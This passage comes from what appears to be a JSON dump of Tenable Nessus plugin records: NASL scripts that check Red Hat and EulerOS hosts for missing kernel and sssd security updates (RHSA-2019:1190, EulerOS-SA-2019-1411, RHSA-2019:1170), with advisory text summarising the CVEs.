pipelines.\nStale load operations results are stored in the 'load port' table\nuntil overwritten by newer operations. Certain load-port operations\ntriggered by an attacker can be used to reveal data about previous\nstale requests leaking data back to the attacker via a timing\nside-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative\nexecution may allow an authenticated user to potentially enable\ninformation disclosure via a side channel with local access.\n(CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming\npackets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function\n(CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege\nescalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct\nin netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET\nimplementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver\n(CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink\nmessage (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors\n(CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via\nbNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: FPU state information leakage via lazy FPU restore\n(CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1692711)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/mds\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:1190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-11600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-13215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-16939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-11091\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2019:1190\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:1190\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.10.0-693.47.2.rt56.641.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:06:24", "bulletinFamily": "scanner", "description": "According to the versions of the sssd packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The UNIX pipe which sudo uses to contact SSSD and read\n the available sudo rules from SSSD utilizes too broad\n of a set of permissions. Any user who can send a\n message using the same raw protocol that sudo and SSSD\n use can read the sudo rules available for any\n user.(CVE-2018-10852)\n\n - It was found that sssd", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1411.NASL", "href": "https://www.tenable.com/plugins/nessus/124914", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : sssd (EulerOS-SA-2019-1411)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124914);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2017-12173\",\n \"CVE-2018-10852\"\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : sssd (EulerOS-SA-2019-1411)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the sssd packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The UNIX pipe which sudo uses to contact SSSD and read\n the available sudo rules from SSSD utilizes too broad\n of a set of permissions. Any user who can send a\n message using the same raw protocol that sudo and SSSD\n use can read the sudo rules available for any\n user.(CVE-2018-10852)\n\n - It was found that sssd's sysdb_search_user_by_upn_res()\n function did not sanitize requests when querying its\n local cache and was vulnerable to injection. In a\n centralized login environment, if a password hash was\n locally cached for a given user, an authenticated\n attacker could use this flaw to retrieve\n it.(CVE-2017-12173)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1411\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62c45445\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sssd packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libipa_hbac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_autofs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_certmap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_idmap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_nss_idmap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsss_sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-sssdconfig\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-ad\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-common-pac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-ipa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-krb5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sssd-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"libipa_hbac-1.16.0-19.5.h3\",\n \"libsss_autofs-1.16.0-19.5.h3\",\n \"libsss_certmap-1.16.0-19.5.h3\",\n \"libsss_idmap-1.16.0-19.5.h3\",\n \"libsss_nss_idmap-1.16.0-19.5.h3\",\n \"libsss_sudo-1.16.0-19.5.h3\",\n \"python-sssdconfig-1.16.0-19.5.h3\",\n \"sssd-1.16.0-19.5.h3\",\n \"sssd-ad-1.16.0-19.5.h3\",\n \"sssd-client-1.16.0-19.5.h3\",\n \"sssd-common-1.16.0-19.5.h3\",\n \"sssd-common-pac-1.16.0-19.5.h3\",\n \"sssd-ipa-1.16.0-19.5.h3\",\n \"sssd-krb5-1.16.0-19.5.h3\",\n \"sssd-krb5-common-1.16.0-19.5.h3\",\n \"sssd-ldap-1.16.0-19.5.h3\",\n \"sssd-proxy-1.16.0-19.5.h3\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sssd\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-01T03:26:52", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.4\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the ", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2019-1170.NASL", "href": "https://www.tenable.com/plugins/nessus/125039", "published": "2019-05-14T00:00:00", "title": "RHEL 7 : kernel (RHSA-2019:1170) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:1170. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125039);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-1000407\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n script_xref(name:\"RHSA\", value:\"2019:1170\");\n script_xref(name:\"IAVA\", value:\"2019-A-0166\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2019:1170) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.4\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the 'fill buffer', a\nmechanism used by modern CPUs when a cache-miss is made on L1 CPU\ncache. If an attacker can generate a load operation that would create\na page fault, the execution will continue speculatively with incorrect\ndata from the fill buffer while the data is fetched from higher level\ncaches. This response time can be measured to infer data in the fill\nbuffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level\nmicro-optimizations to improve the performance of writing data back to\nCPU caches. The write operation is split into STA (STore Address) and\nSTD (STore Data) sub-operations. These sub-operations allow the\nprocessor to hand-off address generation logic into these\nsub-operations for optimized writes. Both of these sub-operations\nwrite to a shared distributed processor structure called the\n'processor store buffer'. As a result, an unprivileged attacker could\nuse this flaw to read private data resident within the CPU's processor\nstore buffer. (CVE-2018-12126)\n\n* Microprocessors use a 'load port' subcomponent to perform load\noperations from memory or IO. During a load operation, the load port\nreceives data from the memory or IO subsystem and then provides the\ndata to the CPU registers and operations in the CPU's pipelines.\nStale load operations results are stored in the 'load port' table\nuntil overwritten by newer operations. Certain load-port operations\ntriggered by an attacker can be used to reveal data about previous\nstale requests leaking data back to the attacker via a timing\nside-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative\nexecution may allow an authenticated user to potentially enable\ninformation disclosure via a side channel with local access.\n(CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming\npackets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function\n(CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege\nescalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct\nin netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET\nimplementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver\n(CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink\nmessage (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors\n(CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via\nbNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407)\n\n* Kernel: FPU state information leakage via lazy FPU restore\n(CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/mds\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:1170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-11600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-13215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-16939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-1000407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-11091\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", 